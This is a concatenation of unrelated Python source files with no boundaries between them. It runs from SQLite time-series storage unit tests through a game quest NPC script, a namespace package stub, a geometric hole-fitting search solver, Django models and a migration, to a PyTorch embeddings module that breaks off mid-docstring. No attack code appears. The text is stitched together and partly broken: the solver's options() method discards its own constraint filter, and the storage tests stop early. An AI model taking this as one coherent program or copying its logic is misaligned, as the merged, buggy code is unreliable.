items_A = [item for item in out_streamingDataTimeSeries] items_B = [item for item in out_streamingDataTimeSeries] self.assertEqual(items_A, items_B) # WARNING: This is specific to SLQlite and its dataTimeStream self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 2) # Now foce load te time series: out_streamingDataTimeSeries.force_load() # After force-loading, another soruce acces is performed self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 3) items_C = [item for item in out_streamingDataTimeSeries] self.assertEqual(items_A, items_C) # Generating the list items_C after a force_load should not generate a new source_access self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 3) # Perform again the iterator check: items_A = [item for item in out_streamingDataTimeSeries] items_B = [item for item in out_streamingDataTimeSeries] self.assertEqual(items_A, items_B) # And ensure that the source accesses is still set to three 
self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 3) def tearDown(self): pass #------------------------------------ # Sensor Storage Tests #------------------------------------ class test_sqlite_storage(unittest.TestCase): def setUp(self): pass def test_Init(self): _ = storage.SQLiteStorage(in_memory=True) def test_PutGet_DataTimePoints(self): dataTimeSeriesSQLiteStorage = storage.SQLiteStorage(in_memory=True) # Generate 10 points DataTimeSeries with flowrate dataTimeSeries = DataTimeSeries() for i in range(10): data = json.dumps({'flowrate_m3s': 20.6+i}) dataTimePoint = DataTimePoint(t = 1436022000 + (i*60), tz="Europe/Rome", data=data) dataTimeSeries.append(dataTimePoint) # Generate 10 points DataTimeSeries with light dataTimeSeries_light = DataTimeSeries() for i in range(10): data = json.dumps({'light_pct': 60.6+i}) dataTimePoint = DataTimePoint(t = 1436022000 + (i*60), tz="Europe/Rome", data=data) dataTimeSeries_light.append(dataTimePoint) # Test put data without id (not implemented for now) with self.assertRaises(NotImplementedError): data_id_1 = dataTimeSeriesSQLiteStorage.put(dataTimeSeries) # Test put data with id and no right to create structure with self.assertRaises(StorageException): dataTimeSeriesSQLiteStorage.put(dataTimeSeries, id='0000001') # Test get with id and no structure in the storage with self.assertRaises(StorageException): _ = dataTimeSeriesSQLiteStorage.get(id='0000001', cached=True) # Test put data with id and right to create structure AND get with id and without from_dt/to_dt # TODO: this is not correct unit test of the put and get. It is testing them at the same time! dataTimeSeriesSQLiteStorage.put(dataTimeSeries, id='0000001', can_initialize=True) out_streamingDataTimeSeries_UTC = dataTimeSeriesSQLiteStorage.get(id='0000001', cached=True) out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000001', cached=True, tz='Europe/Rome') # Check len self.assertEqual(len(out_streamingDataTimeSeries), len(dataTimeSeries)) self.assertEqual(len(out_streamingDataTimeSeries_UTC), len(dataTimeSeries)) # Quick test for i, dataPoint in enumerate(dataTimeSeries): self.assertEqual(out_streamingDataTimeSeries[dataPoint.t].t, dataPoint.t) self.assertEqual(out_streamingDataTimeSeries[dataPoint.t].data, dataPoint.data) # Quick test for i, dataPoint in enumerate(dataTimeSeries): self.assertEqual(out_streamingDataTimeSeries_UTC[dataPoint.t].t, dataPoint.t) self.assertEqual(out_streamingDataTimeSeries[dataPoint.t].data, dataPoint.data) # Time Series equality does not work anymore (therefore the above quick tests) #self.assertEqual(out_streamingDataTimeSeries_UTC, dataTimeSeries) #self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries) # Test get of no data: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000002', cached=True) # We can check the equality against a simple DataTimeSeries empyt_dataTimeSeries = DataTimeSeries() self.assertEqual(out_streamingDataTimeSeries, empyt_dataTimeSeries) # The following test is just for confirm of the above steps. Should not be here in a proper unittesting approach. 
self.assertNotEqual(out_streamingDataTimeSeries, dataTimeSeriesSQLiteStorage.get(id='0000001', cached=True)) # Now test the get with start_dt and end_dt from_dt = dt(2015,7,4,17,3,0, tzinfo='Europe/Rome') to_dt = dt(2015,7,4,17,6,0, tzinfo='Europe/Rome') out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get( id='0000001', from_dt = from_dt, to_dt = to_dt, cached = True) dataTimeSeries_filtered = dataTimeSeries.filter(from_dt = from_dt, to_dt=to_dt) # Quick test for i, dataPoint in enumerate(dataTimeSeries_filtered): self.assertEqual(out_streamingDataTimeSeries[dataPoint.t].t, dataPoint.t) self.assertEqual(out_streamingDataTimeSeries[dataPoint.t].data, dataPoint.data) # Time Series equality does not work anymore (therefore the above quick tests) #self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) def test_PutGet_DataTimeSlots(self): dataTimeSeriesSQLiteStorage = storage.SQLiteStorage(in_memory=True) # Generate 10 slots DataTimeSeries with flowrate aggregated data dataTimeSeries = DataTimeSeries() for i in range(10): data = json.dumps({'flowrate_m3s_AVG':20.6+i, 'flowrate_m3s_MIN':20.6+i, 'flowrate_m3s_MAX':20.6+i, 'volume_m3_TOT':20.6+i}) dataTimeSlot = DataTimeSlot(start = TimePoint(t=1436022000 + (i*60),tz="Europe/Rome"), end = TimePoint(t=1436022000 + ((i+1)*60), tz="Europe/Rome"), data = data, span=TimeSlotSpan('60s')) dataTimeSeries.append(dataTimeSlot) # Generate 10 points DataTimeSeries with light aggregated data dataTimeSeries_light = DataTimeSeries() for i in range(10): data = json.dumps({'light_pct_AVG':20.6+i}) dataTimeSlot = DataTimeSlot(start = TimePoint(t=1436022000 + (i*60),tz="Europe/Rome"), end = TimePoint(t=1436022000 + ((i+1)*60), tz="Europe/Rome"), data = data, span=TimeSlotSpan('60s')) dataTimeSeries_light.append(dataTimeSlot) # Test put data without id (not implemented for now) with self.assertRaises(NotImplementedError): data_id_1 = dataTimeSeriesSQLiteStorage.put(dataTimeSeries) # Test put data with id and no right to create structure with self.assertRaises(StorageException): dataTimeSeriesSQLiteStorage.put(dataTimeSeries, id='0000001') # Test get with id and no structure in the storage with self.assertRaises(StorageException): _ = dataTimeSeriesSQLiteStorage.get(id='0000001', timeSpan='60s', cached=True) # Test put data with id and right to create structure AND get with id and without from_dt/to_dt # TODO: this is not correct unit test of the put and get. It is testing them at the same time! 
dataTimeSeriesSQLiteStorage.put(dataTimeSeries, id='0000001', can_initialize=True) out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000001', timeSpan='60s', cached=True) # Check length self.assertEqual(len(out_streamingDataTimeSeries), len(dataTimeSeries)) return #===================================================== # TODO: Finish adapting the tests for this storage #===================================================== # Quick test #for i, dataPoint in enumerate(dataTimeSeries): # print dataPoint # #self.assertEqual(.t, dataPoint.strat.t) # #self.assertEqual(out_streamingDataTimeSeries[dataPoint.start.t].data, dataPoint.data) # Time Series equality does not work anymore (therefore the above quick tests) #self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries) # Test get of no data: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000002', timeSpan='60s', cached=True) # We can check the equality against a simple DataTimeSeries empyt_dataTimeSeries = DataTimeSeries() self.assertEqual(out_streamingDataTimeSeries, empyt_dataTimeSeries) # The following test is just for confirm of the above steps. Should not be here in a proper unittesting approach. self.assertNotEqual(out_streamingDataTimeSeries, dataTimeSeriesSQLiteStorage.get(id='0000001', timeSpan='60s', cached=True)) # Now test the get with start_dt and end_dt from_dt = dt(2015,7,4,17,3,0, tzinfo='Europe/Rome') to_dt = dt(2015,7,4,17,6,0, tzinfo='Europe/Rome') out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000001', from_dt = from_dt, to_dt = to_dt, timeSpan = '60s', cached = True) dataTimeSeries_filtered = dataTimeSeries.filter(from_dt = from_dt, to_dt=to_dt) self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Also test that if we go trough the cached streaminTimeSeries again, we get the same result: self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Now get the time series without caching: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000001', from_dt = from_dt, to_dt = to_dt, timeSpan = '60s') # Check that we can compare it as is even if it is not cached: self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Check that we can compare it again: self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Now get AGAIn the time series without caching: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000001', from_dt = from_dt, to_dt = to_dt, timeSpan = '60s') # But this time do not test any comparisons (that triggers the caching of the TimeSeries), # instead test that going trough it twice we achieve the same result (under the hood we go twice in the DB): items_A = [item for item in out_streamingDataTimeSeries] items_B = [item for item in out_streamingDataTimeSeries] self.assertEqual(items_A, items_B) # WARNING: This is specific to SLQlite and its dataTimeStream self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 2) # Now foce load te time series: out_streamingDataTimeSeries.force_load() # After force-loading, another soruce acces is performed self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 3) items_C = [item for item in out_streamingDataTimeSeries] self.assertEqual(items_A, items_C) # Generating the list items_C after a force_load should not generate a new source_access self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 3) # 
Perform again the iterator check: items_A = [item for item in out_streamingDataTimeSeries] items_B = [item for item in out_streamingDataTimeSeries] self.assertEqual(items_A, items_B) # And ensure that the source accesses is still set to three self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 3) def tearDown(self): pass
MASTEMA = 2151009

sm.setSpeakerID(MASTEMA)
if not sm.canHold(1142556):
    sm.sendNext("Please clear some space in your equip inventory.")
    sm.dispose()

sm.sendNext("You made it back, #h #! How are you?")
sm.flipDialoguePlayerAsSpeaker()
sm.sendSay("I didn't know I had such anger within me. It is not easy to control.")
sm.setSpeakerID(MASTEMA)
if sm.sendAskYesNo("But you succeeded, #h #! I should write this down for posterity, right?"):
    sm.completeQuest(parentID)
    sm.giveItem(1142556)
    sm.giveAndEquip(1099009)
    sm.jobAdvance(chr.getJob() + 1)
    sm.sendSayOkay("Your inner rage is now under your control, #h #! All that's left for you is to keep training.")
""" Virtual Namespace for 3rd party openaps contributions """ from pkg_resources import declare_namespace from pkgutil import extend_path __path__ = extend_path(__path__, __name__) declare_namespace(__name__)
import itertools import json import math import os import random import sys import time from matplotlib.colors import to_hex from shapely.geometry import Point, Polygon import matplotlib.pyplot as plt import numpy as np PROBLEM_FILEDIR = "problems" SOLUTION_FILEDIR = "solutions" sys.setrecursionlimit(1000000) def vadd(a,b): return tuple(map(sum, zip(a,b))) def vsub(a,b): return tuple(map(lambda x: x[0]-x[1], zip(a,b))) def dist(a, b): return (a[0]-b[0])**2 + (a[1]-b[1])**2 def plot_hole(hole): xs, ys = zip(*hole) xs = list(xs) ys = list(ys) xs.append(xs[0]) ys.append(ys[0]) plt.plot(xs,ys,c='b') def plot_figure(edges, vertices): for edge in edges: a = vertices[edge[0]] b = vertices[edge[1]] xs, ys = zip(a,b) plt.plot(xs, ys,c='r') class problem(): def __init__(self, number): json_state = json.load(open(os.path.join(PROBLEM_FILEDIR, str(number) + ".json"))) self.number = number self.hole = hole(json_state["hole"]) self.figure = figure(json_state) class hole(): def __init__(self, vertices): self.vertices = vertices self.num_vertices = len(vertices) self.vertex_cycle = self.vertices + [self.vertices[0]] self.edges = list(zip(self.vertex_cycle[:-1], self.vertex_cycle[1:])) self.polygon = Polygon(self.vertices) self.inside_set = set() self.dist_dict = {} xs, ys = zip(*self.vertices) for x in range(min(xs), max(xs)+1): for y in range(min(ys), max(ys)+1): if self.polygon.covers(Point(x,y)): self.inside_set.add((x,y)) self.dist_dict[x,y] = [dist((x,y), v) for v in self.vertices] def inside(self, point): """Checks if point is inside the hole.""" if isinstance(point, tuple): return point in self.inside_set return tuple(point) in self.inside_set def dislikes(self, positions): """Calculates the minimum distance to a vertex in positions for each vertex in the hole.""" return [min([dist(h, v) for v in positions]) for h in self.vertices] def plot(self): """Plot the hole.""" xs, ys = zip(*self.vertex_cycle) plt.plot(xs,ys,c='b') class figure(): def __init__(self, problem): self.edges = [(min(a,b), max(a,b)) for (a,b) in problem["figure"]["edges"]] orig_vertices = problem["figure"]["vertices"] self.edge_dists = [] for edge in self.edges: edge_dist = dist(orig_vertices[edge[0]], orig_vertices[edge[1]]) self.edge_dists.append([edge_dist * (1 - problem["epsilon"]/1000000.0), edge_dist * (1 + problem["epsilon"]/1000000.0)]) self.hole = hole(problem["hole"]) self.build_adjacency() self.num_vertices = len(self.adjacency) def build_adjacency(self): self.adjacency = {} self.adj_dists = {} self.adj_vecs = {} for edge_ind, edge in enumerate(self.edges): if edge[0] in self.adjacency: self.adjacency[edge[0]].append(edge[1]) else: self.adjacency[edge[0]] = [edge[1]] if edge[1] in self.adjacency: self.adjacency[edge[1]].append(edge[0]) else: self.adjacency[edge[1]] = [edge[0]] self.adj_dists[edge[0],edge[1]] = self.edge_dists[edge_ind] self.adj_dists[edge[1],edge[0]] = self.edge_dists[edge_ind] self.adj_vecs[edge[0],edge[1]] = ring_options((0,0), *self.edge_dists[edge_ind]) self.adj_vecs[edge[1],edge[0]] = self.adj_vecs[edge[0],edge[1]] def begin_search(self, best_sol = None): """Begin the search for a solution. 
If passed best_sol, will return the first solution at least that good.""" initial_candidates = [partial_figure(self, vertex_index, hole_index) for hole_index in range(self.hole.num_vertices) for vertex_index in range(self.num_vertices)] result = search(initial_candidates, target=best_sol).run() # if v_result is None: # continue # if best_sol is not None: # if v_result.sum_dislikes <= best_sol: # return v_result # elif best_result is not None and v_result.sum_dislikes < best_result.sum_dislikes: # best_result = v_result # elif best_result is None: # best_result = v_result # except: # print("Error") # continue print("result", result) return result def check_line_intersection(line1, line2): """Given two line segments (each defined by two (x,y) pairs), return true if the two segments intersect and false if they do not.""" x1, y1 = line1[0] x2, y2 = line1[1] x3, y3 = line2[0] x4, y4 = line2[1] denom = (x1-x2)*(y3-y4) - (y1-y2)*(x3-x4) if denom == 0: return False ua = ((x1*y2 - y1*x2) * (x3-x4) - (x1-x2) * (x3*y4 - y3*x4)) / denom ub = ((x1*y2 - y1*x2) * (y3-y4) - (y1-y2) * (x3*y4 - y3*x4)) / denom return 0 <= ua <= 1 and 0 <= ub <= 1 def ring_intersection(hole, ca, cb, ed_a, ed_b): """Given two ring centers ca and cb, and two squared radii ranges ed_a and ed_b, find the integer points that are in both rings. Begins by finding the quadrilateral of the 'possible region', and then looks for integer points within that region.""" d = dist(ca, cb) if d == 0: return ring_options(ca, max(ed_a[0], ed_b[0]), min(ed_a[1], ed_b[1])) plus = [] minus = [] for ra, rb in itertools.product(ed_a, ed_b): xc = 0.5 * (ca[0] + cb[0]) + (ra - rb)/(2*d) * (cb[0] - ca[0]) xd = 0.5 * math.sqrt(2 * (ra + rb)/(d) - (ra - rb)**2/(d**2) - 1) * (cb[1] - ca[1]) yc = 0.5 * (ca[1] + cb[1]) + (ra - rb)/(2*d) * (cb[1] - ca[1]) yd = 0.5 * math.sqrt(2 * (ra + rb)/(d) - (ra - rb)**2/(d**2) - 1) * (ca[0] - cb[0]) plus.append((xc+xd, yc+yd)) minus.append((xc-xd, yc-yd)) for flip in [plus, minus]: pxs, pys = zip(*flip) guesses = list(itertools.product(range(math.ceil(min(pxs)), math.floor(max(pxs))+1), range(math.ceil(min(pys)), math.floor(max(pys))+1))) guesses = [g for g in guesses if ed_a[0] <= dist(g, ca) <= ed_a[1] and ed_b[0] <= dist(g, cb) <= ed_b[1] and hole.inside(g)] # plt.scatter(pxs, pys) if len(guesses) > 0: return guesses return [] def ring_quad_options(r1, r2): """Given two squared radii, yield all integer lattice points in the first quadrant of that ring.""" for x in range(math.floor(math.sqrt(r2))): if x ** 2 > r1: min_y1 = 0 else: min_y1 = math.ceil(math.sqrt(r1 - x**2)) max_y2 = math.floor(math.sqrt(r2 - x**2)) for y in range(min_y1, max_y2+1): yield (x, y) def ring_options(center, r1, r2): """Given a center point and two radii, return a list of all integer lattice points in the ring.""" quad = ring_quad_options(r1, r2) result = set() for q in quad: if q == (0,0): result.add(center) else: result.add((center[0] + q[0], center[1] + q[1])) result.add((center[0] + q[0], center[1] - q[1])) result.add((center[0] - q[0], center[1] + q[1])) result.add((center[0] - q[0], center[1] - q[1])) return set(result) class partial_figure(): def __init__(self, figure, vertex_index = None, hole_index = None, to_plot = False): self.figure = figure self.adjacency = figure.adjacency self.adj_dists = figure.adj_dists self.vertices = [(None, None) for _ in range(self.figure.num_vertices)] self.to_extend = set() self.extended = set() self.dislikes = [9999999 for _ in range(self.figure.hole.num_vertices)] if vertex_index is not None and 
hole_index is not None: self.begin(vertex_index, hole_index) self.plot = to_plot @property def sum_dislikes(self): return sum(self.dislikes) def valid(self, vertex_index, next_pos): """Return True iff the part of the figure relating to making vertex_index next_pos is valid.""" if not self.figure.hole.inside(next_pos): return False for edge in self.adjacency[vertex_index]: edge_pos = self.vertices[edge] if edge_pos[0] is not None: dee = dist(next_pos, edge_pos) if dee < self.adj_dists[vertex_index, edge][0] or dee > self.adj_dists[vertex_index, edge][1]: return False for hedge in self.figure.hole.edges: if check_line_intersection([next_pos, edge_pos], hedge): return False return True def valid_full(self): """Return True iff the figure is valid. This checks the validity of the whole figure.""" for vertex in self.vertices: if not self.figure.hole.inside(vertex): return False for edge in self.figure.edges: edge0 = tuple(self.vertices[edge[0]]) edge1 = tuple(self.vertices[edge[1]]) if edge0 is None or edge1 is None: return False dee = dist(edge0, edge1) if dee < self.adj_dists[(edge[0], edge[1])][0] or dee > self.adj_dists[(edge[0], edge[1])][1]: return False for hedge in self.figure.hole.edges: if check_line_intersection([edge0, edge1], hedge): return False return True def begin(self, vertex_index, hole_index): """Initialize with the vertex_index at hole_index; return self.""" self.vertices[vertex_index] = self.figure.hole.vertices[hole_index] self.to_extend = self.to_extend.union(self.adjacency[vertex_index]) self.extended.add(vertex_index) self.dislikes = self.figure.hole.dislikes([self.vertices[vertex_index]]) return self def expand(self): """Return a list of partial figures or placeholder partial figures, each of which has been extended by the next edge removed from to_extend.""" if len(self.to_extend) == 0: return None next_vertex = self.to_extend.pop() self.extended.add(next_vertex) return_list = [] for next_pos in self.options(next_vertex): if next_pos is not None: return_list.append(self.copy_with(next_vertex, next_pos)) if len(return_list) > 0: return return_list else: return None def options(self, next_vertex): """Return a list of positions where it would be possible to place the next vertex.""" # Later I check for other validity; should I just do integer validity here? constraints = [(v, self.vertices[v]) for v in self.adjacency[next_vertex] if v in self.extended] other_ind, other_pos = constraints[0] poss = {vadd(other_pos, vec) for vec in self.figure.adj_vecs[next_vertex, other_ind]} poss = {v for v in poss if v in self.figure.hole.inside_set} for constraint in constraints[1:]: other_ind, other_pos = constraint [v for v in poss if vsub(other_pos, v) in self.figure.adj_vecs[next_vertex, other_ind]] return poss # elif len(constraints) == 2: # return ring_intersection(self.figure.hole, constraints[0][0], constraints[1][0], constraints[0][1], constraints[1][1]) # else: # candidates = None # for cona, conb in itertools.product(constraints): # TODO: this actually only needs the sorted product? 
# new_candidates = set(ring_intersection(self.figure.hole, cona[0], conb[0], cona[1], conb[1])) # if candidates is not None: # candidates = candidates.intersection(new_candidates) # if len(candidates) == 0: # return None # else: # candidates = new_candidates # return list(candidates) def copy_with(self, next_vertex, next_pos): """Return a copy of self, extended by the next vertex at next_pos.""" if not self.valid(next_vertex, next_pos): return None novel = partial_figure(self.figure) novel.vertices = self.vertices.copy() novel.vertices[next_vertex] = next_pos novel.to_extend = self.to_extend.union([v for v in self.adjacency[next_vertex] if v not in self.extended]) novel.extended = self.extended.copy() novel.dislikes = [min(a,b) for a,b in zip(self.dislikes, self.figure.hole.dislikes([next_pos]))] if self.plot: plot_hole(self.figure.hole.vertices) pruned_edges = [e for e in self.figure.edges if e[0] in novel.extended and e[1] in novel.extended] plot_figure(pruned_edges, novel.vertices) plt.scatter(next_pos[0], next_pos[1], c='m') plt.title(str(next_pos)) plt.show() return novel class search(): def __init__(self, candidates: list, target=None): if len(candidates) == 0: return None self.num_searched=0 self.candidates = set(candidates) self.finished = None self.target = target def run(self): while len(self.candidates) > 0 and (self.finished is None or self.finished.sum_dislikes > self.target): self.step() return self.finished def step(self): """step randomly picks a candidate to expand from the set and expands it.""" # if target is not None and len(candidates[0].to_extend) == 0 and sum(candidates[0].dislikes) <= target: # return candidates[0] # next_expansion = self.candidates.pop() next_expansion = sorted(self.candidates, key=lambda f: f.sum_dislikes)[0] self.candidates.remove(next_expansion) if self.num_searched % 100 == 0: print(self.num_searched, len(self.candidates), self.finished.sum_dislikes if self.finished else "-", len(next_expansion.extended), len(next_expansion.to_extend)) expansion = next_expansion.expand() if expansion is not None: for e in expansion: if e is None: continue if len(e.to_extend) == 0 and e.valid_full(): if self.finished is None: self.finished = e elif e.sum_dislikes < self.finished.sum_dislikes: self.finished = e elif len(e.to_extend) > 0 and e not in self.candidates: self.candidates.add(e) self.num_searched += 1 if __name__ == "__main__": numbers = [24] #[21, 24, 25, 26, 34, 35, 38, 39, 41] for number in numbers: p = problem(number) result = p.figure.begin_search(best_sol=0) if result is None: print("No solution found") else: plot_hole(p.figure.hole.vertices) plot_figure(p.figure.edges, result.vertices) print(result.sum_dislikes) print(result.dislikes) print(p.figure.hole.dislikes(result.vertices)) plt.show() json.dump({"vertices": result.vertices}, open(os.path.join("solutions",f"{number}-{result.sum_dislikes}-{time.time()}.json"),'w'))
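# To make the scoring concrete: `dist` above is the *squared* Euclidean
# distance, and the dislikes of a pose give, for every hole vertex, the minimum
# squared distance to any pose vertex.  A tiny hand-checkable standalone
# example (toy hole and pose, not one of the real problems):
def _dist(a, b):
    return (a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2


def _dislikes(hole_vertices, pose_vertices):
    return [min(_dist(h, v) for v in pose_vertices) for h in hole_vertices]


toy_hole = [(0, 0), (4, 0), (4, 4), (0, 4)]
toy_pose = [(0, 0), (2, 1)]
print(_dislikes(toy_hole, toy_pose))   # [0, 5, 13, 13] -> total 31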
from __future__ import unicode_literals

from django.db import models
from sortedm2m.fields import SortedManyToManyField
from django.utils.encoding import python_2_unicode_compatible


@python_2_unicode_compatible
class Author(models.Model):
    name = models.CharField(max_length=100)

    def __str__(self):
        return self.name


@python_2_unicode_compatible
class Book(models.Model):
    name = models.CharField(max_length=100)
    authors = SortedManyToManyField(Author)

    def __str__(self):
        return self.name
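# What SortedManyToManyField buys over a plain ManyToManyField is that the
# relation remembers insertion order.  Sketch of the expected behaviour in a
# Django shell (the author names are arbitrary examples):
#
#   alice = Author.objects.create(name="Alice")
#   bob = Author.objects.create(name="Bob")
#   book = Book.objects.create(name="Example Book")
#   book.authors.add(bob)
#   book.authors.add(alice)
#   [a.name for a in book.authors.all()]   # ["Bob", "Alice"], not alphabetical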
# Generated by Django 3.0.6 on 2020-10-18 14:50

from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Task',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('title', models.CharField(max_length=250)),
                ('date', models.DateField()),
                ('status', models.CharField(max_length=1)),
            ],
        ),
    ]
import math from typing import Tuple, Union, Optional import torch from torch import nn from torch import Tensor from flambe.compile import registrable_factory from flambe.nn.module import Module class Embeddings(Module): """Implement an Embeddings module. This object replicates the usage of nn.Embedding but registers the from_pretrained classmethod to be used inside a Flambé configuration, as this does not happen automatically during the registration of PyTorch objects. The module also adds optional positional encoding, which can either be sinusoidal or learned during training. For the non-learned positional embeddings, we use sine and cosine functions of different frequencies. .. math:: \text{PosEncoder}(pos, 2i) = sin(pos/10000^(2i/d_model)) \text{PosEncoder}(pos, 2i+1) = cos(pos/10000^(2i/d_model)) \text{where pos is the word position and i is the embed idx) """ def __init__(self, num_embeddings: int, embedding_dim: int, padding_idx: int = 0, max_norm: Optional[float] = None, norm_type: float = 2., scale_grad_by_freq: bool = False, sparse: bool = False, positional_encoding: bool = False, positional_learned: bool = False, positonal_max_length: int = 5000) -> None: """Initialize an Embeddings module. Parameters ---------- num_embeddings : int Size of the dictionary of embeddings. embedding_dim : int The size of each embedding vector. padding_idx : int, optional Pads the output with the embedding vector at :attr:`padding_idx` (initialized to zeros) whenever it encounters the index, by default 0 max_norm : Optional[float], optional If given, each embedding vector with norm larger than :attr:`max_norm` is normalized to have norm :attr:`max_norm` norm_type : float, optional The p of the p-norm to compute for the :attr:`max_norm` option. Default ``2``. scale_grad_by_freq : bool, optional If given, this will scale gradients by the inverse of frequency of the words in the mini-batch. Default ``False``. sparse : bool, optional If ``True``, gradient w.r.t. :attr:`weight` matrix will be a sparse tensor. See Notes for more details. positional_encoding : bool, optional If True, adds positonal encoding to the token embeddings. By default, the embeddings are frozen sinusodial embeddings. To learn these during training, set positional_learned. Default ``False``. positional_learned : bool, optional Learns the positional embeddings during training instead of using frozen sinusodial ones. Default ``False``. positonal_max_length : int, optional The maximum length of a sequence used for the positonal embedding matrix. Default ``5000``. 
""" super().__init__() self.num_embeddings = num_embeddings self.embedding_dim = embedding_dim self.num_positions = positonal_max_length self.token_embedding = nn.Embedding(num_embeddings, embedding_dim, padding_idx, max_norm, norm_type, scale_grad_by_freq, sparse) self.pos_embedding = None if positional_learned and not positional_encoding: raise ValueError("postional_encoding is False, but positonal_learned is True") elif positional_encoding and positional_learned: self.pos_embedding = nn.Embedding(positonal_max_length, embedding_dim) elif positional_encoding and not positional_learned: # Use sinusodial encoding position = torch.arange(0, positonal_max_length, dtype=torch.float).unsqueeze(1) div_term = torch.arange(0, embedding_dim, 2).float() div_term = torch.exp(div_term * (-math.log(10000.0) / embedding_dim)) pos_embedding = torch.zeros(positonal_max_length, embedding_dim) pos_embedding[:, 0::2] = torch.sin(position * div_term) pos_embedding[:, 1::2] = torch.cos(position * div_term) self.pos_embedding = nn.Embedding.from_pretrained(pos_embedding, freeze=True) @registrable_factory @classmethod def from_pretrained(cls, embeddings: Tensor, freeze: bool = True, padding_idx: int = 0, max_norm: Optional[float] = None, norm_type: float = 2.0, scale_grad_by_freq: bool = False, sparse: bool = False, positional_encoding: bool = False, positional_learned: bool = False, positonal_max_length: int = 5000, positonal_embeddings: Optional[Tensor] = None, positonal_freeze: bool = True): """Create an Embeddings instance from pretrained embeddings. Parameters ---------- embeddings: torch.Tensor FloatTensor containing weights for the Embedding. First dimension is being passed to Embedding as num_embeddings, second as embedding_dim. freeze: bool If True, the tensor does not get updated in the learning process. Default: True padding_idx : int, optional Pads the output with the embedding vector at :attr:`padding_idx` (initialized to zeros) whenever it encounters the index, by default 0 max_norm : Optional[float], optional If given, each embedding vector with norm larger than :attr:`max_norm` is normalized to have norm :attr:`max_norm` norm_type : float, optional The p of the p-norm to compute for the :attr:`max_norm` option. Default ``2``. scale_grad_by_freq : bool, optional If given, this will scale gradients by the inverse of frequency of the words in the mini-batch. Default ``False``. sparse : bool, optional If ``True``, gradient w.r.t. :attr:`weight` matrix will be a sparse tensor. See Notes for more details. positional_encoding : bool, optional If True, adds positonal encoding to the token embeddings. By default, the embeddings are frozen sinusodial embeddings. To learn these during training, set positional_learned. Default ``False``. positional_learned : bool, optional Learns the positional embeddings during training instead of using frozen sinusodial ones. Default ``False``. positonal_embeddings: torch.Tensor, optional If given, also replaces the positonal embeddings with this matrix. The max length will be ignored and replaced by the dimension of this matrix. 
positonal_freeze: bool, optional Whether the positonal embeddings should be frozen """ if embeddings.dim() != 2: raise ValueError('Embeddings parameter is expected to be 2-dimensional') if positonal_embeddings is not None: if positonal_embeddings.dim() != 2: raise ValueError('Positonal embeddings parameter is expected to be 2-dimensional') if positonal_embeddings.size() != embeddings.size(): raise ValueError('Both pretrained matrices must have the same dimensions') rows, cols = embeddings.shape positional_encoding = positional_encoding or (positonal_embeddings is not None) embedding = cls(num_embeddings=rows, embedding_dim=cols, padding_idx=padding_idx, max_norm=max_norm, norm_type=norm_type, scale_grad_by_freq=scale_grad_by_freq, sparse=sparse, positional_encoding=positional_encoding, positional_learned=positional_learned, positonal_max_length=positonal_max_length) embedding.token_embedding.weight.data = embeddings embedding.token_embedding.weight.requires_grad = not freeze if positonal_embeddings is not None: embedding.pos_embedding.weight.data = positonal_embeddings # type: ignore embedding.pos_embedding.weight.requires_grad = not positonal_freeze # type: ignore return embedding def forward(self, data: Tensor) -> Tensor: """Perform a forward pass. Parameters ---------- data : Tensor The input tensor of shape [S x B] Returns ------- Tensor The output tensor of shape [S x B x E] """ out = self.token_embedding(data) if self.pos_embedding is not None: column = torch.arange(data.size(0)).unsqueeze(1) positions = column.repeat(1, data.size(1)).to(data) out = out + self.pos_embedding(positions) return out class Embedder(Module): """Implements an Embedder module. An Embedder takes as input a sequence of index tokens, and computes the corresponding embedded representations, and padding mask. The encoder may be initialized using a pretrained embedding matrix. Attributes ---------- embeddings: Module The embedding module encoder: Module The sub-encoder that this object is wrapping pooling: Module An optional pooling module drop: nn.Dropout The dropout layer """ def __init__(self, embedding: Module, encoder: Module, pooling: Optional[Module] = None, embedding_dropout: float = 0, padding_idx: Optional[int] = 0) -> None: """Initializes the TextEncoder module. Extra arguments are passed to the nn.Embedding module. Parameters ---------- embedding: nn.Embedding The embedding layer encoder: Module The encoder pooling: Module, optional An optioonal pooling module, takes a sequence of Tensor and reduces them to a single Tensor. embedding_dropout: float, optional Amount of dropout between the embeddings and the encoder padding_idx: int, optional Passed the nn.Embedding object. See pytorch documentation. """ super().__init__() self.embedding = embedding self.dropout = nn.Dropout(embedding_dropout) self.encoder = encoder self.pooling = pooling self.padding_idx = padding_idx def forward(self, data: Tensor) -> Union[Tensor, Tuple[Tensor, Tensor]]: """Performs a forward pass through the network. Parameters ---------- data : torch.Tensor The input data, as a float tensor of shape [S x B] Returns ------- Union[Tensor, Tuple[Tensor, Tensor]] The encoded output, as a float tensor. May return a state if the encoder is an RNN and no pooling is provided. 
